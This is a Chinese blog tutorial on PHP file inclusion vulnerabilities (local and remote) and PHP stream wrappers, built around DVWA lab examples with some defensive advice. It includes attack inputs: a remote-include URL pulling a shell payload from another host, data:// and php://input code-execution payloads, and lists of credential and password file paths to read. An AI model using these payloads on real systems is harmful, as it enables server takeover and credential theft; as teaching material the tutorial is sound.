文件包含漏洞及PHP伪协议

最新推荐文章于 2024-05-08 13:09:41 发布
最新推荐文章于 2024-05-08 13:09:41 发布
阅读量1.1k 收藏 18
点赞数 2
分类专栏: Web安全 文章标签: php 安全漏洞 安全 http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46684578/article/details/117535480
版权

文件包含漏洞及PHP伪协议

文件包含漏洞

一般都在url中

1. 原理

在java中 引用一个头文件(类)用的是 import

在C/C++中 引用一个头文件用的是 include

在PHP中 引用一个头文件用的是 include()、require()、include_once()、require_once()

攻击利用的原理

原理:当使用上述四个函数包含一个新的文件的时候,该文件将会被当作PHP来执行,PHP内核并不会在意被包含的文件是什么类型。所以如果被包含的是txt文件、图片文件、远程url,也都会被当作php代码执行。这一特性,在攻击者实施攻击时将非常有用。

<?php
    include($_GET[file]);
?>

这一段代码写在前端,意思就是向服务器端发送get请求,请求 file=…/…/etc/passwd 的页面,然后展示到前端页面上。因此,我们可以在url框内将file的值改变,提交后,敏感信息就可能被泄露

黑客通常会将文件包含漏洞与上传结合在一起,上传内容带有php语句的图片,在通过文件包含漏洞包含该图片,达到执行php代码的目的,控制服务器。

攻击成功的条件

  1. 上述四个函数通过动态变量的方式引入需要包含的文件
  2. 用户能够控制该动态变量

2. 分类

本地文件包含

Local File Inclusion,简称LFI

http://192.168.1.101/shell123.php //本地IP地址为 192.168.1.101

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
本地文件包含是能够打开本地文件的漏洞。在攻击的时候,需要先上传payload到跟网站的根目录,然后再执行本地文件包含。但是上传payload之前要知道网站的根目录,找网站根目录有一定难度

LFI的利用

windows下的敏感文件路径

c:\windows\my.ini     \\安装mysql时会将root密码写入该文件
c:\windows\system32\config\sam  \\存放windows管理员登陆密码
c:\windows\system32\inetsrv\MetaBase.xml  \\存放iis配置文件
c:\tomcat5.0\conf\resin.conf  tomcat存放密码的位置

linux下的敏感文件路径

/usr/local/app/apache2/conf/httpd.conf 		//apache2缺省配置文件
/usr/local/app/php5/lib/php.ini   	//PHP相关设置
/etc/sysconfig/network-scripts/ifcfg-eth0 		 //查看IP
/etc/my.cnf   		//mysql的配置文件
/etc/redhat-release 	//系统版本/etc/rc.local   有时可以读出来apache的路径
/etc/passwd   /etc/shadow     //密码存放文件

远程文件包含

在LFI的基础上,将PHP配置文件(php.ini)中的allow_url_include 选项修改为 ON,allow_url_fopen 选项改为 ON

http://192.168.1.103/01/index.php?file=http://192.168.1.101/shell1.txt
//不需要找到网站的根目录,用远程的方式。
//可以购买一个公网服务器,在上面写入payload,然后将此payload写入目标服务器

在这里插入图片描述
在这里插入图片描述

风险比较高,但是操作比较复杂,不需要找到网站的根目录

3. 文件包含漏洞防范

禁止0字节

防止攻击者截断攻击

<?php
Function getVar($page)
{
    $value = isset($_GET[$page]) ? $_GET[$page] : null;
    if (is_string($value)){
        $value = str_replace("\0",'', $value);
    }
}
?>

防范原理

为了安全起见,开发人员通常以路径拼接的方式包含文件。

比如攻击者输入的正确路径为 /etc/passwd,提交过后,后台会自动在此路径后面加上一段字符,破坏这个正确的路径,提交给服务器之后,由于攻击者提交的正确路径被修改,因此无响应,就不会泄露敏感信息。

绕过的方式也很简单,就是用url编码的方式

在PHP中配置open_basedir

限制PHP仅能打开某个文件夹的文件,使攻击者无法遍历服务器文件

尽量避免动态包含的变量

尤其是用户可以控制的变量,可以通过枚举实现

<?php
$file = $_GET['page'];

//枚举可能的值
Switch ($page) {
    case 'include.php':
    case 'file1':
    case 'file2':
    case 'file3':
        include 'C:\phpStudy\WWW\dvwa\vulnerabilities\fi\' . $page . '.php';
        break;
    default:
        include 'C:\phpStudy\WWW\dvwa\vulnerabilities\fi\include.php'
}
?>

allow_url_include置为off

禁止include/require等函数加载远程文件

4. PHP伪协议

此编程语言支持的协议和封装的协议

简单的说,如果要通过php发送http请求,我们可以直接调用php的相关函数。因为开发人员在开发php这个语言的时候,已经将http协议用PHP语言编写好了,我们直接调用即可。

深入了解伪协议,对获取敏感信息有很大的帮助

file:// 	— 访问本地文件系统
http://		 — 访问 HTTP(s) 网址
ftp:// 		— 访问 FTP(s) URLs
php:// 		— 访问各个输入/输出流(I/O streams)
zlib:// 	— 压缩流
data:// 	— 数据(RFC 2397)
glob:// 	— 查找匹配的文件路径模式
phar:// 	— PHP 归档
ssh2:// 	— Secure Shell 2
rar:// 		— RAR
ogg:// 		— 音频流
expect:// 	— 处理交互式的流

file://

file://这个伪协议可以展示“本地文件系统”
file://这个协议后需跟文件的绝对路径。

用法

/path/to/file.ext
relative/path/to/file.ext
fileInCwd.ext
C:/path/to/winfile.ext
C:\path\to\winfile.ext
\\smbserver\share\path\to\winfile.ext
file:///path/to/file.ext

DVWA实例

在这里插入图片描述

http://

允许通过 HTTP 1.0 的 GET方法,以只读访问文件或资源。 HTTP 请求会附带一个 Host: 头,用于兼容基于域名的虚拟主机。 如果在你的 php.ini 文件中或字节流上下文(context)配置了 user_agent 字符串,它也会被包含在请求之中。

数据流允许读取资源的 body,而 headers 则储存在了 $http_response_header 变量里。

如果需要知道文档资源来自哪个 URL(经过所有重定向的处理后), 需要处理数据流返回的系列响应报头(response headers)。

用法

http://example.com
http://example.com/file.php?var1=val1&var2=val2
http://user:password@example.com
https://example.com
https://example.com/file.php?var1=val1&var2=val2
https://user:password@example.com

ftp://

ftp:// – ftps:// — 访问 FTP(s) URLs

允许通过 FTP 读取存在的文件,以及创建新文件。 如果服务器不支持被动(passive)模式的 FTP,连接会失败。

打开文件后你既可以读也可以写,但是不能同时进行。 当远程文件已经存在于 ftp 服务器上,如果尝试打开并写入文件的时候, 未指定上下文(context)选项 overwrite,连接会失败。 如果要通过 FTP 覆盖存在的文件, 指定上下文(context)的 overwrite 选项来打开、写入。 另外可使用 FTP 扩展来代替。

如果你设置了 php.ini 中的 from 指令, 这个值会作为匿名(anonymous)ftp 的密码。

用法

ftp://example.com/pub/file.txt
ftp://user:password@example.com/pub/file.txt
ftps://example.com/pub/file.txt
ftps://user:password@example.com/pub/file.txt

php://

php:// — 访问各个输入/输出流(I/O streams)

PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。

php://stdin, php://stdout 和 php://stderr

php://stdin、php://stdout 和 php://stderr 允许直接访问 PHP 进程相应的输入或者输出流。 数据流引用了复制的文件描述符,所以如果你打开 php://stdin 并在之后关了它, 仅是关闭了复制品,真正被引用的 STDIN 并不受影响。 注意 PHP 在这方面的行为有很多 BUG 直到 PHP 5.2.1。 推荐你简单使用常量 STDIN、 STDOUT 和 STDERR 来代替手工打开这些封装器。

php://stdin 是只读的, php://stdout 和 php://stderr 是只写的。

php://input

可以执行本地PHP代码

allow_url_include=On

DVWA 实例

在这里插入图片描述
用法
php://input
并且 在Post data中输入PHP代码

php://output

php://output 是一个只写的数据流, 允许你以 print 和 echo 一样的方式 写入到输出缓冲区。

php://fd

php://fd 允许直接访问指定的文件描述符。 例如 php://fd/3 引用了文件描述符 3。

php://memory 和 php://temp

php://memory 和 php://temp 是一个类似文件 包装器的数据流,允许读写临时数据。 两者的唯一区别是 php://memory 总是把数据储存在内存中, 而 php://temp 会在内存量达到预定义的限制后(默认是 2MB)存入临时文件中。 临时文件位置的决定和 sys_get_temp_dir() 的方式一致。

php://temp 的内存限制可通过添加 /maxmemory:NN 来控制,NN 是以字节为单位、保留在内存的最大数据量,超过则使用临时文件。

php://filter

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。

php://filter 目标使用以下的参数作为它路径的一部分。 复合过滤链能够在一个路径上指定。详细使用这些参数可以参考具体范例。

zlib://

zlib:// – bzip2:// – zip:// — 压缩流

compress.zlib:// and compress.bzip2://

zlib: 的功能类似 gzopen(),但是 其数据流还能被 fread() 和其他文件系统函数使用。 不建议使用,因为会和其他带“:”字符的文件名混淆; 请使用 compress.zlib:// 替代。

compress.zlib://、 compress.bzip2:// 和 gzopen()、bzopen() 是相等的。并且可以在不支持 fopencookie 的系统中使用。

ZIP 扩展 注册了 zip: 封装器。 自 PHP 7.2.0 和 libzip 1.2.0+ 起,加密归档开始支持密码,允许数据流中使用密码。 字节流上下文(stream contexts)中使用 ‘password’ 选项设置密码。

可选项

compress.zlib://file.gz
compress.bzip2://file.bz2
zip://archive.zip#dir/file.txt

data://

data:// — 数据(RFC 2397)

自 PHP 5.2.0 起 data:(» RFC 2397)数据流封装器开始有效

用法

data://text/plain;base64,  
例如:data://text/plain,<?php phpinfo(); ?>         # data://text/plain,  是固定内容

DVWA实例
在这里插入图片描述

// 获取网站首页目录
http://192.168.29.128:8002/?file=data://text/plain,<?php $aa=file_get_contents("http://192.168.29.128"); echo $aa; ?>

在这里插入图片描述

ssh2://

ssh2:// — Secure Shell 2

注意: 该封装器默认没有激活
为了使用 ssh2.*😕/ 封装协议, 你必须安装来自 » PECL 的 » SSH2 扩展。

除了支持传统的 URI 登录信息,ssh2 封装协议也支持通过 URL 的主机(host)部分来复用打开连接。

用法

ssh2.shell://user:pass@example.com:22/xterm
ssh2.exec://user:pass@example.com:22/usr/local/bin/somecmd
ssh2.tunnel://user:pass@example.com:22/192.168.0.1:14
ssh2.sftp://user:pass@example.com:22/path/to/filename

ogg://

ogg:// — 音频流

通过包装器 ogg:// 读取的文件, 是作为 OGG/Vorbis 格式的压缩音频编码。 同样,通过包装器 ogg:// 写入或追加的数据格式也是压缩音频。 当 stream_get_meta_data() 用于一个打开读取的 OGG/Vorbis 文件时,会返回关于数据流的详细信息,包含了 vendor 标签、任何内含的 comments、 channels 数字、采样率(rate),以及 用 bitrate_lower、bitrate_upper、 bitrate_nominal 和 bitrate_window 描述的可变比特率范围。

用法

ogg://soundfile.ogg
ogg:///path/to/soundfile.ogg
ogg://http://www.example.com/path/to/soundstream.ogg

expect://

expect:// — 处理交互式的流

由 expect:// 封装协议打开的数据流 PTY 通过提供了对进程 stdio、stdout 和 stderr 的访问。

注意: 该封装协议默认未开启
为了使用 expect:// 封装器,你必须安装 » PECL 上的 » Expect 扩展。

用法

expect://command

https://www.php.net/manual/zh/wrappers.php

Buffedon
关注
  • 2
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 6493
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
文件包含漏洞-伪协议
weixin_53303754的博客
10-15 244
File://、php://filter、php://input、data://、http://、phar://、zip://
Web安全PHP伪协议漏洞利用,以及伪协议漏洞防护方法_php伪协议漏洞
最新发布
2401_84247760的博客
05-08 1039
今天介绍一个比较冷门的知识,只有在PHP环境中存在的伪协议漏洞,那么什么是PHP伪协议呢?PHP伪协议事实上就是支持的协议与封装协议。可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。除了这些封装协议,还能通过 stream_wrapper_register() 来注册自定义的封装协议。ctf中的文件包含、文件读取的绕过、正则的绕过等等会需要用到。
【每天学习一点新知识】文件包含常用之伪协议
RexHa的博客
02-06 3634
一些比较常用的php伪协议用法及部分演示过程
PHP 伪协议
波吉桑
03-21 486
当深入了解 PHP 伪协议时,你会发现它们提供了丰富的功能,能够简化许多常见的任务,同时也需要谨慎处理以确保安全性。
web安全之目录遍历攻击,文件包含
qidiandexiaowu
10-17 1755
目录0×00 目录遍历攻击 0×00 目录遍历攻击 目录遍历是Http所存在的一个安全漏洞,它使得攻击者能够访问受限制的目录,并在Web服务器的根目录以外执行命令。 目录遍历攻击可能从两个方面产生: ①利用web应用代码实行目录遍历攻击 ②利用web服务器进行目录遍历攻击 原理: 程序在实现上没有充分过滤用户输入的…/之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。 读取文件的url: http://127.0.0.1/my.jsp?file=xxx.html 如果服务器允
php伪协议.zipphp伪协议.zip
02-24
在提到的“php伪协议.docx”文件中,可能包含了更详细的关于PHP伪协议的使用示例、历史背景,以及如何在受限环境中安全地使用这些机制的信息。这个文档可能涵盖了如何在不违反安全策略的情况下,利用PHP伪协议来实现...
信息安全技术基础:本地文件包含漏洞.pptx
11-01
【信息安全技术基础:本地文件包含漏洞】 在网络安全领域,本地文件包含漏洞(Local File Inclusion,简称LFI)是一种常见的安全问题,它涉及到网站应用程序如何处理用户输入来决定要加载的本地文件。这类漏洞允许...
信息安全技术:PHP伪协议.pptx
11-01
【信息安全技术:PHP伪协议】 在信息安全领域,理解并掌握编程语言中的安全机制至关重要,特别是对于Web开发常用的语言如PHPPHP伪协议PHP中的一种特殊机制,它允许开发者通过特定的URL格式来访问和操作各种资源...
LFIboomCTF:本地文件包含突破实践原始码以及相应协议利用指南
03-23
实际上:文件包含漏洞是“代码注入”的一种,包含即执行,可干的坏事可想而知,看i春秋总结的危害有如下几种: PHP包含突破性合并上传漏洞PHP包含读文件; PHP包含写文件; PHP包含日志文件; PHP截断包含;...
PHP代码审计音频文件.zip
11-02
任务13:PHP代码审计之目录穿越及文件包含漏洞mp4 任务12:PHP代码审计之文件上传漏洞mp4 任务11:代码审计之CSRF漏洞mp4 任务10:代码审计之XSS漏洞mp4 任务9:代码审计之命令执行漏洞mp4 任务8:代码审计之代码执行...
Web安全PHP伪协议漏洞利用,以及伪协议漏洞防护方法
Scalzdp的专栏
11-13 2074
单纯看伪协议利用与之前的文件包含漏洞及其相似,但是在真实环境中是对用户输入进行了过滤替换的,在使用漏洞就需要不断考虑如何绕过这些过滤条件。只要我们开发过程中对于使用了伪协议这些函数的时候,一定要严格对用户参数进行过滤,避免一时偷懒导致服务器被黑,其实最终难逃其就。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵。
伪协议利用
一只web狗
06-23 1653
PHP伪协议PHP带有很多内置URL风格的封装协议,可用于类似fopen()、copy()、file_exists()和filesize()的文件系统函数。
php伪协议漏洞_文件包含漏洞+PHP伪协议
weixin_31706903的博客
01-17 380
BugkuCTF点击发现url中有 ?file=show.php 并且题目flag在index里 猜测文件包含PHP伪协议。猜测php://被过滤构造payload?file=php://filter/read=convert.base64-encode/resource=index.php用base64解码找到flagBugku-ctferror_reporting(0);if(!$_GET[...
【网络安全篇】php文件包含漏洞
贤鱼的博客
10-13 1661
php文件包含漏洞--思路+例题讲解
渗透测试-文件包含漏洞以及php伪协议的应用
lza20001103的博客
07-20 3131
渗透测试-文件包含漏洞以及php伪协议的应用
i春秋 afr1 解题过程 题解 原理 PHP伪协议 文件包含漏洞
AAAAAAAAAAAA66的博客
11-20 846
知识面决定攻击的广度,知识链决定攻击的深度。 最近尝试了一下挖洞,捣鼓了一天还是啥都没有,没有头绪后,还是去写点CTF题,扩充下知识面,2个方向算是互补吧。 工具 dirsearch(目录扫描工具) 火狐 hackbar 知识点 php://伪协议 php://伪协议PHP提供的一些输入输出流访问功能,允许访问PHP的输入输出流,标准输入输出的错误描述符,内存中,磁盘备份的临时文件流,以及可以操作其他读取和写入文件资源的过滤器。 php://filter是元封装器...
文件包含&php伪协议
Xiiaogu的博客
12-14 625
将文件进行base64编码再读出,即在file=后,flag前加上php://filter/read=convert.base64-encode/resource=file=php://input,下方输入<?没有flag,再输入<?添加完数据后打开终端,查找目录下文件,输入ls,没有flag。返回查找根目录,输入ls /,里边有flag文件。
PHP伪协议精讲(文件包含漏洞)
2301_76251460的博客
07-21 783
PHP伪协议
文件包含-伪协议filter
08-22
伪协议filter是一种用于文件包含伪协议。它不受allow_url_fopen和allow_url_include参数的影响,可以用来读取本地文件系统或访问HTTP、FTP等协议的URL。 在PHP中,可以使用php://filter伪协议来读取文件内容并对其进行处理。例如,使用php://filter/resource=来读取文件内容,php://filter/read=convert.base64-encode/resource=可以将文件内容以base64编码输出。 通过使用filter伪协议,攻击者可以利用文件包含漏洞来读取敏感文件,包括PHP源代码、配置文件等。因此,在编写PHP代码时,务必要注意对用户输入进行严格过滤和验证,避免文件包含漏洞的利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [文件包含-伪协议](https://blog.csdn.net/Wu000999/article/details/101925271)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTF---Web---文件包含---02---rot13伪协议](https://blog.csdn.net/qq_22160557/article/details/119174803)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Buffedon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值